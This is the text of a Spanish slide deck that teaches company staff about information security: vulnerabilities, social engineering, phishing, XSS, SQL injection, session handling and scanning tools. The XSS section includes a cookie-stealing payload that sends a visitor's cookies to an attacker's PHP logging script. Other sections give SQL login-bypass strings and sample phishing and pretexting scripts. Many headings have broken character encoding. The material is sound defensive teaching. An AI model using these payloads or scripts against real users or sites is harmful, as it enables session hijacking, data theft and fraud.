Seguridad en la informaci贸n
Seguridad de la información 1.
En nuestra empresa, vida diaria, que problemas de seguridad apreciáis
2.
Estas preparado ante vulnerabilidades físicas
3.
Cada cuanto tiempo hacéis copias de seguridad y dónde las guardas
4.
Crees que eres vulnerable a la ingeniería social
5.
Empleas el email para enviar información confidencial
6.
En donde crees que debemos invertir más en seguridad
7.
De 0 a 10, que importancia le das a la información que manejas en la empresa
8.
De 0 a 10, como consideras de seguras nuestras contraseñas
9.
Se puede hacer un sistema 100% seguro
Infraestructuras – hardware – software – personal
Seguridad de la información p
Protección de la información y de los sistemas de información contra n
Acceso indebido
n
Uso, negligente o no
n
Divulgación
n
Interrupción
n
Destrucción no autorizada
Seguridad de la información p
Conceptos básicos n
Confidencialidad p p
La información solo debe ser legible para personal autorizado Evita que exista una intercepción de esta y que pueda ser leída por una persona no autorizada
Seguridad de la informaci贸n p
Conceptos b谩sicos n
Disponibilidad p
n
Irrefutabilidad p
n
Garantiza el acceso
No se puede negar la autor铆a
Autenticaci贸n p
Solo individuos autorizados tienen acceso a los recursos
Seguridad de la informaci贸n p
Conceptos b谩sicos n
Integridad p
Garantizar que los datos sean los que se suponen que son y no se hayan alterados in situ o durante una transmisi贸n
Seguridad de la informaci贸n Existe la seguridad absoluta???
Seguridad de la informaci贸n p Todo
es vulnerable si se aplica la fuerza justa
p La
aplica
煤nica raz贸n por la cual utilizamos rejas en nuestras casas es porque hace que el ataque sea m谩s lento
Seguridad de la informaci贸n p
El costo de la seguridad aumenta exponencialmente a la necesidad de minimizar el riesgo
p
Un hacker puede gastar una 铆nfima parte en intentar vulnerar un sistema de lo que cuesta evitar el ataque
p
Las empresas asumen riesgos a fin de minimizar costes
Seguridad de la información p
Objetivo: p
p
Una máxima: p
p
Obtener un factor coste/riesgo asumible
El sistema de seguridad no puede ser más valioso que el sistema o los datos que protege
Existen documentos, directrices y recomendaciones para establecer políticas de seguridad adecuadas
Seguridad de la informaci贸n
VULNERABILIDAD
Seguridad de la informaci贸n p
Vulnerabilidad
n
Es la posibilidad de que una amenaza se materialice sobre un activo
n
Las amenazas pueden desencadenar incidentes en: p p p p p
La organizaci贸n Los procedimientos Equipos Software Informaci贸n
Seguridad de la información p
Analogía con el mundo real:
p
En el mundo informático el funcionamiento es muy similar
p
Existe un agujero de seguridad y mientras éste permanezca abierto estaremos predispuestos a sufrir un ataque.
Seguridad de la informaci贸n p
Ciclo de vida de una vulnerabilidad: n n
Supongamos que se ha descubierto una vulnerabilidad Es de dominio p煤blico y a煤n no hay disponible ni soluci贸n ni parche
Seguridad de la información p
Ciclo de vida de una vulnerabilidad: 1.
Creación: p p
2.
no intencionada en la creación o actualización de un producto error en el desarrollo o descuido en la configuración.
Descubrimiento y publicación: p p
Webs que ofrecen información diaria sobre las últimas vulnerabilidades y cuentan con extensas BD: National Vulnerability Database (EN) § http://nvd.nist.gov/
p
SecurityFocus (EN)
§ http://www.securityfocus.com/vulnerabilities
p
Secunia (EN)
§ http://secunia.com/advisories/historic/
Seguridad de la información p
Ciclo de vida de una vulnerabilidad: 3.
Explotación de la vulnerabilidad: p
4.
se intenta desarrollar programas que automaticen el proceso.
Desarrollo de solución o parche: p
se desarrolla una solución efectiva y permanente al agujero de seguridad.
Entre las distintas posibilidades: p
p
Publicación por parte del fabricante de un parche o actualización del producto Métodos de prevención temporales o no oficiales como la publicación de un parche independiente del fabricante, el cierre de puertos, la desactivación de servicios, etc.
Seguridad de la información p
Ciclo de vida de una vulnerabilidad: 5.
Difusión de la actualización: p p
Finaliza la existencia del defecto de seguridad Masivamente a través de mecanismos de actualización automática así como de una integración total con el producto afectado
Nueva “actualización” posible nueva vulnerabilidad?
Seguridad de la informaci贸n p
Qu茅 tipos de vulnerabilidades existen Los ataques se pueden producir en cada eslab贸n de esta cadena, siempre y cuando exista una vulnerabilidad que pueda aprovecharse
Seguridad de la información p
Tipos de vulnerabilidades n
Vulnerabilidad Física: el atacante tiene posibilidad de entrada o acceso físico a las instalaciones e incluso a los equipos: p p p p p
n
Interrupción del suministro eléctrico. Apagado manual del equipo. Vandalismo. Apertura de la carcasa del equipo y robo del disco duro. Monitorización del tráfico de red.
Vulnerabilidad Natural: se refiere al grado en que el sistema puede verse afectado por desastres naturales o ambientales que pueden dañar el sistema: p p
Fuego Inundaciones
Rayos Fallos eléctricos
Terremotos Picos de tensión
Seguridad de la información p
Tipos de vulnerabilidades n
Vulnerabilidad del Hardware y del Software: ciertos tipos de dispositivos requieren la posesión de algún tipo de herramienta o tarjeta para poder acceder a los mismos p p
n
Bugs de los sistemas operativos Bugs en software en general
Vulnerabilidad por emanación: los dispositivos eléctricos y electrónicos emiten radiaciones electromagnéticas
Seguridad de la información p
Centrándonos en vulnerabilidades de Software: n
De configuración: es una vulnerabilidad no del diseño del mismo sino del usuario. p
p
n
n
Se considera error cuando la configuración por defecto es insegura Ej.: aplicación recién instalada con usuario por defecto
Gestión de credenciales: tiene que ver con la gestión de usuarios, contraseñas y los ficheros que los almacenan Permisos, privilegios y/o control de acceso: ocurre cuando el acceso o asignación de permisos es defectuoso p
Se trata del sistema y no del administrador
Seguridad de la información p
Centrándonos en vulnerabilidades de Software: n
Validación de entrada p
n
Salto de directorio p
n
es la falta de seguridad de un servicio de red para desplazarse por el árbol de directorios hasta la raíz del sistema. Podrá desplazarse para ejecutar una utilidad de forma remota
Seguimiento de enlaces p
n
se produce cuando la entrada que procesa un sistema no es comprobada adecuadamente
cuando no existe una protección bastante robusta para evitar el acceso a un directorio desde un enlace simbólico o acceso directo
Por puertas trampa/traseras p
son entradas ocultas en un programa de software que permite el acceso
Seguridad de la información p
Centrándonos en vulnerabilidades de Software: n
Por intrusiones: existen diversos tipos: p p
Análisis de puertos Elevación de privilegios: consiste en enviar una solicitud específica. En ciertos casos, esto genera comportamientos atípicos. § desbordamiento de búfer: se desborda cuando de forma incontrolada intenta meter más datos de los que caben. Son defectos de programación y existen lenguajes que lo evitan § agotamiento del búfer: cuando un búfer usado para comunicarse entre 2 dispositivos se alimenta con datos a una velocidad mas baja de la que lee
p
Ataques malintencionados (virus, gusanos, troyanos).
Seguridad de la información p
Centrándonos en vulnerabilidades de Software: n
Secuencia de comandos en sitios cruzados (XSS): abarca cualquier ataque que permite ejecutar código de scripting (Ej.: javascript) en el contexto de otro dominio. p p
Aplicaciones HTML Navegadores
El problema radica en incorrecta validación de los datos de entrada: hay 2 tipos: p p
Indirecta: modifica valores que la aplicación web utiliza para pasar variables entre paginas, sin sesiones (URL) Directa: localiza puntos débiles en la programación de filtros (Formularios)
Seguridad de la informaciรณn p
Centrรกndonos en vulnerabilidades de Software: n
SQL Injection: estรก en el nivel de BD de una aplicaciรณn. p
p
n
Consiste en insertar un trozo de cรณdigo SQL dentro de otro con el fin de modificar su comportamiento. Se realiza una consulta con parรกmetros dados por el usuario y dentro de esos datos estarรญa el cรณdigo malicioso
Por denegaciรณn de servicio: interrumpir el funcionamiento normal de un servicio. p
Las denegaciones de servicio se dividen: ยง Explotaciรณn de las debilidades del protocolo TCP/IP. ยง Explotaciรณn de las vulnerabilidades del software del servidor.
Seguridad de la información p
Centrándonos en vulnerabilidades de Software: n
Inyección de código: Existen distintos subtipos: p
Inyección directa de código estático
§ Código en el contenido de las páginas § Permanente § Solución usar listas negras y listas blancas
p
Evaluación directa de código dinámico § § § §
p
Código en contenido dinámico No permanente Necesidad de crear funciones Solución usar listas negras y listas blancas
Inclusión remota de archivos PHP
§ Uso de la función include() o require() que permite enlazar archivos en otros servidores § Si en el include/require incorporamos variables o funciones que puedan ser alteradas
Seguridad de la información
INGENIERÍA SOCIAL
Seguridad de la información p
La mayor parte de los ataques exitosos son total o parcialmente debidos a Ingeniería Social
p
Kevin Mitnick “Condor” es considerado el primer hacker que la usó. (Doc: Freedom downtown) n n
“El factor determinante es interpretar correctamente las políticas de seguridad y hacerlas cumplir” Los ataques de ingeniería social (teléfono o email), son basados en cuatro principios básicos y comunes a las personas: p p p p
Todos queremos ayudar Somos confiados No nos gusta decir No A todos nos gusta que nos alaben
Seguridad de la información p
Ingeniería social n
Consiste en la manipulación de las personas para que voluntariamente realicen actos que normalmente no harían
n
Se convierte en el método de ataque más sencillo, menos peligroso para el atacante y por desgracia en uno de los más efectivos
n
Aprovecha el desconocimiento de unas mínimas medidas de seguridad
Seguridad de la información p
Ingeniería social
Ah, también gestiono una red. ¿Cómo configura sus firewalls?
Nunca pude pensar en una buena contraseña. ¿Qué utiliza usted?
Seguridad de la información p
Ingeniería social - Phishing Phisher se prepara para atacar
Phisher utiliza la información para suplantar a víctima
Phisher envía mail fraudulento a victimas
Información confidencial es enviada al Phisher
Víctima sigue indicaciones de phisher Víctima compromete información confidencial
Seguridad de la información p
Ejemplos Ingeniería social n
correo electrónico:
From: Super-User <root@sistema.com> To: Usuario <user@sistema.com> Subject: Cambio de clave Hola, Para realizar una serie de pruebas orientadas a conseguir un optimo funcionamiento de nuestro sistema, es necesario que cambie su clave mediante la orden 'passwd'. Hasta que reciba un nuevo aviso (aproximadamente en una semana), por favor, asigne a su contraseña el valor 'PEPITO' (en mayúsculas). Rogamos disculpe las molestias. Saludos, Administrador
Seguridad de la información p
Ejemplos Ingeniería social n
Llamada telefónica (el atacante sabe el nombre de cuenta):
Administrador: Buenos días, aquí área de sistemas, en qué podemos ayudarle? Atacante: Hola, soy José Luis Pérez, llamaba porque no consigo recordar mi password en la máquina sistema.xx.es. Administrador: Un momento, me puede decir su nombre de usuario? Atacante: Sí, claro, es jlperez. Administrador: Muy bien, la nueva contraseña que acabo de asignarle es *****. Por favor, nada más conectar, no olvide cambiarla. Atacante: Por supuesto. Muchas gracias, ha sido muy amable. Administrador: De nada, un saludo.
Seguridad de la informaci贸n p
Ejemplos Ingenier铆a social n
http://www.youtube.com/watch?v=Ao20tAS3x3I
n
http://www.youtube.com/watch?v=wiRuBZxMLss&feature=re lated (3 videos)
n
http://www.youtube.com/watch?v=NgHYI4AUUPc
n
http://www.youtube.com/watch?v=cm89EQCF5e8&feature=re lated
Seguridad de la informaci贸n
PHISHING
Seguridad de la informaci贸n p
Como funciona 1. 2. 3.
p
Correo electr贸nico masivo Correo electr贸nico phishing Sitio Web fraudulento
Afecta principalmente n n n
instituciones financieras proveedores internet grandes tiendas
Seguridad de la informaci贸n p
Correo n
Remitente:
Banco Bilbao Vizcaya Argentaria info@bbva.es
n
Asunto:
Aviso Importante n n n n
Logotipo oficial Aviso de Phishing Derechos reservados Tel茅fono de contacto
Seguridad de la informaci贸n
Reconocer铆as una web falsa?
Seguridad de la informaci贸n
Seguridad de la informaci贸n
Seguridad de la informaci贸n
Seguridad de la informaci贸n
Seguridad de la informaci贸n p
Correo donde el INE hace un sondeo sobre satisfacci贸n con los bancos 1. 2.
Damos la informaci贸n Nos redirige a la web oficial
Seguridad de la información p 40%
error incluso entre usuarios “tecnológicamente avanzados”
www.bankofthevvest.com www.hatmail.com http://www.faccebook.es/
Seguridad de la informaci贸n
p
http://www.phishtank.com/ n n n n
Facebook: http://faccebook.c.la/ PayPal: http://www.phishtank.com/phish_detail.php?phish_id=916961 Bank of America: http://www.phishtank.com/phish_detail.php?phish_id=916955 Hotmail: http://www.phishtank.com/phish_detail.php?phish_id=916948
Seguridad de la información p
Otros tipos de phishing n
Vía programa malicioso. p
n
Troyano que instala programa espía (en juegos y aplicaciones free)
A través de ataque al navegador con vulnerabilidades p p
Permite generar interfaces superpuestas sobre webs oficiales Muy difícil de detectar
n
Scam: ofertas de trabajo para blanquear dinero
n
Nuevas variantes: p p p
Vishing: con tecnología VoIp (Identificador de llamada falsificable) Smishing: usan SMS Spear phishing: el correo va al jefe (CEO) § Correo personalizado § No usan correo masivo
Seguridad de la información p
Tendencias n
A la profesionalización p p p p
Ataques sofisticados y difíciles de detectar Difícil identificar interfaces falsas Simulación de URL Ataques sobre DNS
n
Siguen funcionando los ataque simples e ingeniería social de nivel bajo
n
Cada vez más las pequeñas empresas afectadas
Seguridad de la información p
Prevención n
Su usuario, contraseña, pin, firma, etc. son datos de carácter personal y estrictamente confidenciales
n
Desconfíe de cualquier toma de datos personales realizada a través de Internet fuera de su sitio web seguro.
n
No dé nunca información personal o financiera en respuesta a un e-mail
n
No utilice los enlaces incorporados en e-mails o páginas Web de terceros
n
Cuidado con los adjuntos (exe, doc, xls…)
n
Educación y mucha cultura de seguridad
Seguridad de la informaci贸n
COMO PROTEGERNOS
Seguridad de la información p ¿Cómo
nos protegemos de la forma más eficiente posible? 1. 2. 3. 4.
Determinando que queremos proteger (ej: Hardware, datos, comunicaciones, sistemas, etc.) Estableciendo prioridades de los factores a proteger Creando políticas de seguridad Manteniendo la seguridad en el tiempo
Seguridad de la informaci贸n p Debemos n
enfocarnos en
reducir el riesgo, no en tratar de eliminar las amenazas, ya que es imposible.
p Para
eso debemos saber
de qu茅 o qui茅nes nos protegemos n c贸mo nos atacan. n
Seguridad de la información p
Pocos ataques tienen éxito sin una preparación previa: Infiltrado de programas, recopilación de información sobre usuarios, claves, etc.
p
Un sistema de seguridad es tan fuerte como su eslabón más débil
p
Para poder defender nuestros sistemas, es necesario conocer la forma en que los atacantes actúan y cuáles son sus armas
“El único sistema que está seguro es el que se encuentra debidamente apagado y dentro de una caja ignifuga” (Gene Spafford)
Seguridad de la informaci贸n Ataques organizativos Hackers
Ataques automatizados
Datos restringidos DoS Infracciones accidentales de la seguridad Virus, caballos de Troya y gusanos
Errores de conexi贸n
Denegaci贸n de servicio (DoS)
Seguridad de la informaci贸n p Estrategias n
de seguridad
Proactivas (proteger y proceder) Se basan en la prevenci贸n de ataques p Reducir al m铆nimo la cantidad de puntos vulnerables p Desarrollar planes de contingencia p
n
Reactivas (perseguir y procesar) Posterior al ataque p Evaluar ataque, reparar e implementar plan de contingencia, documentar y aprender p
Seguridad de la información p Estrategias
de seguridad
Con respecto a la postura en recursos compartidos n
Lo que no se permite está expresamente prohibido p
n
El sistema está perfectamente delimitado
Lo que no se prohíbe está permitido p
Menos restrictiva y favorecida por la imposibilidad de políticas de restricción a medida para todos los posibles casos
Seguridad de la información p Estrategias
de seguridad
Datos Aplicación Host Red interna Perímetro Seguridad física Políticas, procedimientos y conciencia
Encriptación Seguridad de programas y servicios Fortalecer el sistema operativo, autenticación Marketing, Ventas, Finanzas, encriptar datos de red Oficina principal, oficina sucursal, socio de negocios. Firewall Protecciones, seguros, dispositivos de seguimiento Documentos de seguridad, educación del usuario
Seguridad de la informaci贸n p
Debemos formar al usuario: Cultura de seguridad Formatos potencialmente peligrosos No abrir archivos no solicitados No utilizar fuentes no confiables Navegaci贸n segura Pol铆tica de passwords Copias de seguridad
Seguridad de la informaci贸n
FIRMA Y CIFRADO DE CORREO
Seguridad de la información p
Cifrar: Alterar el contenido para que sólo los destinatarios puedan entenderlo
p
Firmar: permite al destinatario comprobar que el mensaje no fue modificado en el camino y que lo que lee es exactamente lo que se envió
p
Como lo hacemos p
Clave pública: § § §
p
Clave privada: § § §
p
La conocen sólo los destinatarios Permite a la gente verificar nuestra firma y crear mensajes cifrados para nosotros. Para enviar correos cifrados
Sólo la conoce el emisor Permite firmar y descifrar correo Para enviar correos firmados
no se puede averiguar una a través de la otra.
Seguridad de la informaci贸n p
Ejemplo de firma
Seguridad de la informaci贸n p
Ejemplo de cifrado
Seguridad de la información p
Cifrado con PGP (GNU Privacy Guard) n n n n
Aplicación de cifrado asimétrico libre http://www.gnupg.org/ ftp://ftp.gnupg.org/gcrypt/binary/ (windows) http://macgpg.sourceforge.net/(mac) p
p
Necesitamos un cliente de correo n n
p
Instalamos PGP
Thunderbird http://es-es.www.mozillamessaging.com/esES/thunderbird/
Necesitamos un software de cifrado y autenticación n n n n
Enigmail 1.0.1 https://addons.mozilla.org/es-ES/thunderbird/addon/71 Instalamos: ThunderbirdàHerramientasàComplementos Genera nueva opción de menú OpenPGP
Seguridad de la información p
Generar las claves n
OpenPGP à Administración de claves
n
En el administrador de claves p p
p
Configuración de las claves n
p
Generar à Nuevo par de claves Generar certificado de revocación
En la configuración de la cuenta : activar soporte OpenPGP
Subir claves públicas a n
http://www.rediris.es/cert/servicios/keyserver/
Seguridad de la información p
Encriptar con GMAIL n
Configurar el navegador “Conexión del navegador” para usar siempre https
n
Instalamos PGP
n
Usaremos Mozilla Firefox
n
Instalamos el complemento para Firefox p p p p
n
FireGPG http://es.getfiregpg.org/s/install Incompatible con FireFTP Reiniciar si es necesario
Acceder a Gmail y firmar y cifrar a través de iconos
Seguridad de la informaci贸n
AMENAZAS EN LA RED
Seguridad de la información p
Existen 4 tipos de amenazas en la red: n
Interrupción: Hace que el objetivo del ataque se pierda, quede inutilizable o no disponible
n
Interceptación: Consiste en acceder a un determinado objeto del sistema
n
Modificación: Además de la interceptación, el objeto del ataque es modificado
n
Fabricación: Modificación destinada a suplantar el objeto real
Seguridad de la informaci贸n
Seguridad de la informaci贸n p Ataques n n n n
Premeditaci贸n Descuido Ignorancia Indiferencia de las pol铆ticas de seguridad
p Ataques n n
Internos
externos
Hackers, Crackers, Lammers, Script-Kiddies Motivaciones: p p p
Ranking, reto personal Robo de datos Pruebas (pen test), etc.
Seguridad de la información p
Origen de las amenazas n
Personas: Piratas que buscan nivel de privilegios en un sistema. Además de conocimientos técnicos, usan tácticas como la Ingeniería Social y el Basureo.
n
Personal de la organización: Cualquier empleado puede ser una amenaza. Pueden causar daños no intencionados, pero cuando lo hacen de forma intencionada son extremadamente dañinos
n
Ex-empleados: Pueden tener motivos para Atacar
n
Curiosos: Aunque se trata de ataques no destructivos, el borrado de huellas puede causar daños
Seguridad de la informaci贸n
Seguridad de la información p Hackers (expertos) n De sombrero blanco p Ayudan a mejorar los sistemas y tecnologías informáticas p Responsables de los protocolos informáticos y herramientas p Optimizan sistemas, prueban las tecnologías y aprenden con el objetivo de hacerlas mas eficientes y fiables n De sombrero negro (piratas) p Propósito siempre malicioso
Seguridad de la información p
De sombrero negro (piratas) n
Script Kiddies (crashers, lamers, packet monkeys) p Jóvenes usuarios que usan programas encontrados en la red par dañar sistemas p Sin conocimientos y altamente incompetentes p
n
Lamer. Se utiliza con tono despectivo para describir a un hacker que no sigue las reglas de la comunidad, o que intenta pavonearse de sus hazañas y conocimientos.
Phreakers p Usan la red telefónica para hacer llamadas gratis
Seguridad de la informaci贸n p De
sombrero negro (piratas)
n
Caders: atacan sistemas de tarjetas (generalmente bancarias) para entender su funcionamiento y aprovechar sus vulnerabilidades
n
Crackers: crean software para atacar sistemas inform谩ticos o eliminar la protecci贸n anticopia del software con licencia
n
Hacktivistas: Hackers con motivaciones ideolog铆as
Seguridad de la informaci贸n
EN LA WEB
Seguridad de la informaci贸n p Servidores n
y platatormas web
Ataques internos
p
Suplantaci贸n de identidad Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR) Robo de informaci贸n. (Ej: para la competencia) Virus, Troyanos, Gusanos Espionaje: Trashing, Shoulder Surfing, Spyware, etc Keylogging - Keycatching
p
KeyCatcher
p p
p p p
Seguridad de la información p
Trashing (basureo) n
Alfombrilla ratónà
Seguridad de la información p Servidores n
y platatormas web
Ataques externos p
Ataques contra servicios WEB § Cross Site Scripting (XSS) § SQL Injection § Exploits: aprovecha una vulnerabilidad de SO, Sw y Hw
p p p p p
p
Robo de Identidad Denegación de Servicio (DoS) SPAM VIRUS Phishing: ingeniería social, url mal escritas, webs simuladas Troyanos: software malicioso bajo una apariencia inofensiva
Seguridad de la informaci贸n
CROSS SITE SCRIPTING
XSS
Seguridad de la información p
Servidores y platatormas web n
Cross Site Scripting (XSS) p
p
p
p p p
Aprovecha la falta de mecanismos de filtrado en los campos de entrada Permiten insertar y enviar datos sin validación alguna, aceptando el envió de scripts completos Pueden generar secuencias de comandos maliciosas que impacten directamente en el sitio o en el equipo de un usuario Sentencias ocultas en el código: en enlaces, formularios… Se usa el correo electrónico para enviarlos Se usan blogs, foros, libros de visitas…
Seguridad de la información p
Ejemplos Cross Site Scripting (XSS) Supongamos que un sitio web tiene la siguiente forma: http://www.example.com/home.asp?frame=menu.asp En este ejemplo, ¿qué pasaría si se pone como URL del frame un código javascript? javascript:while(1)alert("Este mensaje saldrá indefinidamente");
Seguridad de la información p
Ejemplos Cross Site Scripting (XSS)
Un atacante aprovecha la vulnerabilidad de nuestro sitio y publica una imagen de la siguiente manera: http://www.mipagina.com/mifoto.jpg name="foto“ onload="foto.src='http://www.mipagina.com/foto.php? galleta='%20+document.cookie;">
Código de foto.php. <? $migalleta = $_REQUEST[galleta]; $file=fopen("cookies.txt", "a"); fput($file, "$migalleta\n"); fclose($file); ?>
La variable que contiene las cookies galleta del usuario será almacenada en un documento de texto llamado cookies.txt alojado en el servidor del atacante
Seguridad de la información p
Defensa Cross Site Scripting (XSS) n
Url p p
n
En formularios: p p
n
Evitar llamadas a servidores externos Evitar parámetros susceptibles (sql, datos privados…) Limitar la longitud de los campos de entrada MaxLength Validar los campos (expresiones regulares)
Cookies p
Evitar almacenar datos susceptibles § Nombre usuario y contraseña § Tarjetas, cuentas bancarias …
p
n
Encriptar todas las cookies de nuestro sitio
Usar SSL (Secure Socket Layer) p
No es 100% seguro contra XSS pero ayuda
Seguridad de la informaci贸n
SQL INJECTION
Seguridad de la información p
SQL Injection n
Filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL.
<% usuario=request.form("usuario") pass=request.form("pass") sql="SELECT * FROM usuarios WHERE user='" & usuario & "' and password='" & pass & "'“ %> p
n
El usuario teclea en el formulario usuario:" a' or true ‘" contraseña: " a' or true ‘“
La cadena resultado sería SELECT * FROM users WHERE user='a' or true and pass='a' or true
n
Otro ejemplo SELECT * FROM users WHERE user = ‘root' AND password='' OR ''='‘ --
Seguridad de la informaci贸n p
SQL Injection n
Mas peligroso p
n
Se pueden concatenar sentencias de modificaci贸n, insertado y borrado de datos o de tablas
Soluci贸n: p p p p
No usar usuario root para acceso a las BBDD Validar el contenido y longitud de los campos Usar procedimientos almacenados Evitar es que, al formar la cadena SQL, 茅sta tenga un "sentido" distinto al esperado = Eliminar comillas
$query_result = mysql_query("SELECT * FROM usuarios WHERE nombre = \"" . mysql_real_escape_string($nombre_usuario) . "\"");
Seguridad de la información
AUTENTIFICACIÓN
Seguridad de la informaci贸n p
Autentificaci贸n de usuarios en la web n
Se emplean sesiones p
n
Son variables globales que nos permiten almacenar datos que necesiten volver a ser usados en otros accesos a la pagina
Pasos p p
p
Se crea el formulario de validaci贸n (login.php) Se comprueba la validez del usuario (autenticacion.php) Se crea la sesi贸n y se da acceso al usuario o se deniega el mismo
Seguridad de la informaci贸n
Seguridad de la información p
Sesiones (autenticacion.php) <?php //vemos si el usuario y contraseña son válidos if ($_POST["usuario"]=="usuario" && $_POST["contrasena"]=="123"){ //usuario y contraseña válidos session_start(); $_SESSION["autenticado"]= "SI"; // seguridad almacenando sesion_id() $_SESSION[“id_misesion"]= session_id(); header ("Location: aplicacion.php"); }else { //si no existe se va a login.php header("Location: login.php?errorusuario=si"); } ?>
Seguridad de la información p
Sesiones (seguridad.php) <?php //Inicio la sesión session_start(); //COMPRUEBA QUE EL USUARIO ESTA AUTENTICADO if ($_SESSION["autenticado"] != "SI") { //si no existe, va a la página de autenticacion header("Location: login.php"); //salimos de este script exit(); } ?> n
Este código lo incluimos en todas las páginas que requieran validación
Seguridad de la informaci贸n
HERRAMIENTAS
Seguridad de la información p
GFI LANguard : n
Escanea redes e informa de: p
p
p
El nivel de service pack de cada máquina, falta de parches de seguridad, recursos compartidos, puertos abiertos, servicios/ aplicaciones activas en el equipo, datos del registro, passwords débiles, usuarios y grupos, puntos de acceso wireless, dispositivos USB ... Escanea los resultados y los guarda en documentos HTML, sobre los que se puede consultar la información Existe una versión gratuita que está disponible para su prueba y uso no comercial durante 30 días
http://www.gfi.com/lannetscan
Seguridad de la informaci贸n p
eEye retina: n
Su funci贸n es explorar todas las maquinas de una red e informar sobre cualquier vulnerabilidad encontrada
n
Esta muy distribuida en el mercado, es sencilla y r谩pida para el escaneo de vulnerabilidades
http://www.eeye.com/Products/Retina.aspx
Seguridad de la información p
Nikto: n n n n
n n
Nikto es un escáner de servidores Web Open source (GPL) Busca más de 2000 archivos/CGIs potencialmente peligrosos y problemas en más de 200 servidores. Tiene la capacidad de no sólo probar vulnerabilidades de CGI sino también que lo hace de forma evasiva, evitando los sistemas de detección de intrusos. Viene con una documentación muy completa, la cual es recomendable revisar antes de ejecutar el programa. Es una buena herramienta pero limitada por su uso de Whisker/ libwhisker, debido a la falta de actualizaciones de esta última, por lo que las vulnerabilidades más críticas no son detectadas
http://www.cirt.net/nikto2
http://www.madirish.net/?article=216 (cómo instalar en windows)
Seguridad de la informaci贸n p
WebScarab n
Herramienta que permite analizar aplicaciones que se comunican usando protocolos de comunicaci贸n Web como el HTTP y el HTTPS
n
Almacena los resultados de sus escaneos
n
Dise帽ada para permitir a un desarrollador de aplicaciones basadas en HTTP(S) a depurar los errores de implementaci贸n y permitir identificar vulnerabilidades en el sistema
http://sourceforge.net/projects/owasp/files/WebScarab/
Seguridad de la información p
Asociación de internautas n
Scanner on-line
n
Realiza un escaneo en remoto de los ‘puertos bien conocidos’ del sistema objeto del estudio
n
Permite seleccionar los puertos que quieres analizar (hasta un máximo de 5 puertos)
n
Devuelve como resultado únicamente el estado (abierto, cerrado) en el que se encuentran los puertos seleccionados previamente
http://www.internautas.org/w-scanonline.php
Seguridad de la información p Dr. Web n
Ofrece una herramienta On-line para el análisis en línea de direcciones de Internet en busca de código malicioso que pudiera estar inyectado en las páginas HTML.
n
En el caso de ser así, nos avisará que el acceso a este sitio podría ser peligroso, ya que podría dañar la configuración del sistema, por lo que sería aconsejable no acceder a dicha URL.
http://online.us.drweb.com/?url=1
Seguridad de la información p LinkScanner n
Analiza URLs en línea o bajo demanda o si prefiere instalarla como herramienta de escritorio
n
Realiza un análisis de los resultados de búsquedas Web con motores de Google, MSN y Yahoo, para determinar si las páginas mostradas en la búsqueda realizada contienen virus, software espía, explotan alguna vulnerabilidad o se utilizan con otros fines fraudulentos.
http://linkscanner.explabs.com/linkscanner/default.aspx
Seguridad de la informaci贸n p Virus Total n
Servicio de an谩lisis de archivos sospechosos que permite detectar virus, gusanos, troyanos, y malware en general
n
Trabaja con los principales motores de antivirus y antimalware: Avast!, Avira, Quick Heal, Clamwin, NOD 32, AVG, Antivir, Ikarus, Panda Platinum, BitDefender, Norton Antivirus
n
http://www.virustotal.com/
Seguridad de la información p Nessus n
Es la herramienta de evaluación de vulnerabilidades para UNIX de mayor renombre
n
Nessus quizás sea el mejor escáner de vulnerabilidades "Open Source" (GPL) que hay disponible en la red
n
Se actualiza constantemente, con más de plugins gratuitos
n
Nessus 3 ahora es de código cerrado, aunque de coste gratuito a menos que desees los plugins más recientes
http://www.nessus.org
11.000
Seguridad de la información p Nessus n n n
n
Basado en un modelo cliente/servidor que cuenta con su propio protocolo de comunicación El servidor explora y prueba ataques contra objetivos establecidos El cliente realiza las tareas de control, generación de informes y presentación de datos Consta de 4 ficheros básicos: p p p p
Las librerías del programa Las librerías NASL (Nessus Attack Scripting Language) El núcleo de la aplicación Los plugins (gestionan los diferentes tipos de ataques)
Seguridad de la informaci贸n p Nessus
Seguridad de la informaciรณn n
Las 75 Herramientas de Seguridad Mรกs Usadas p
n
http://insecure.org/tools/tools-es.html
packet sniffers para Ethernet/LAN : p Wireshark (anteriormente conocido como Ethereal ), p
p
Ettercap, TCPDump, WinDump, WinSniffer, Hunt, Darkstat, traffic-vis, KSniffer) Redes inalรกmbricas: Kismet, Network Stumbler , ApSniffer
Seguridad de la informaci贸n
NORMAS A SEGUIR
Seguridad de la información p Normas
de defensa
n
Respetar las políticas de seguridad
n
Antivirus + Firewall
n
Siempre tener nuestros servicios, sistemas operativos y aplicaciones actualizadas a la última versión conocida estable
n
Utilizar mecanismos de criptografía para almacenar y transmitir datos sensibles
n
Cambiar las claves cada cierto tiempo
Seguridad de la información p
Normas de defensa n
Asignar un responsable de seguridad
n
Auto-auditar nuestros propios servicios
n
Autoatacarnos para saber si somos o no vulnerables
n
Estar siempre alerta. Es muy común: ”a nosotros nadie nos ataca”.
n
No dejar información sensible en directorios web
n
No usar las mismas claves para servicios distintos p
Muy común: la clave de root sea la misma que la de MySQL y la misma que Apache ...
Seguridad de la información p Normas
de defensa
n
Cambiar los puertos por defecto en servicios no públicos
n
Aplicar técnicas de Hardening
n
Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas) en Internet y redes no seguras
n
Habilitar módulos de seguridad (Ej mod_security en Apache)
Seguridad de la información p Normas
de defensa
n
Nunca trabajar con ”root” si no es estrictamente necesario
n
Cerrar puertos y eliminar aplicaciones innecesarias
n
Proteger las URL (ej: mod_rewrite, o AJAX)
Seguridad de la información p Normas
de defensa
n
Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y caracteres especiales.
n
Las claves no deben ser palabras coherentes ni de diccionario
n
10 contraseñas mas usadas en la red de 32 millones p
123456-12345-123456789-password-iloveyou-princessrockyou-1234567-12345678-abc123
Seguridad de la informaci贸n
Seguridad de la información p
Normas de defensa n
Datos: p p
p p p
16% usa su primer nombre como contraseña. 14% usa combinaciones excesivamente fáciles de recordar como 1234, 123456, QWERTY 5% eran nombres de celebridades tipo hanna, matrix o ironman. 4% corresponden a palabras como password o password1. 3% llegan a los límites del WTFismo con simples si, no, whatever.
n
Contraseña segura simple: s+6o1e$7
n
Herramientas:
http://keepass.info/: almacena p http://passworg.badhim.com/: genera y valida p
Seguridad de la información
“Seguridad no es un producto, es un proceso.” Bruce Schneier
Seguridad de la informaci贸n http://www.rompecadenas.com.ar/ http://foro.portalhacker.net/ http://www.elhacker.org http://www.kriptopolis.org/
Seguridad de la informaci贸n